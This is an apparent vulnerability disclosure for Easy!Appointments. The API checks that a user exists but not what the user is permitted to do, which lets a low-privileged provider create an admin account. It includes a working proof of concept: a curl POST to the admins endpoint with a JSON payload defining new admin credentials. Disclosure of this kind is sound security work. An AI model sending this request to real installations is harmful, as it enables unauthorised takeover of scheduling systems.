Description

Privilege escalation occurs when a user gets access to more resources or functionality than they are normally allowed, and such elevation or changes should have been prevented by the application. This is usually caused by a flaw in the application.

On Easy!Appointments API authorization is checked against the user’s existence, without validating the permissions. As a result, a low privileged user (eg. provider) can create a new admin user via the “/api/v1/admins/” endpoint and take over the system.

Proof of Concept

curl --request POST https://easyappointments.org/index.php/api/v1/admins/ -d @payload.json --user user:pass

payload.json

{
        "id": 100,
        "firstName": "Admin",
        "lastName": "Admin",
        "email": "[email protected]",
        "mobile": null,
        "phone": "111",
        "address": null,
        "city": null,
        "state": null,
        "zip": null,
        "notes": null,
        "timezone": "UTC",
        "settings": {
            "username": "usern@me",
            "password": "p@ssw0rd",
            "notifications": true,
            "calendarView": "default"
        }
    }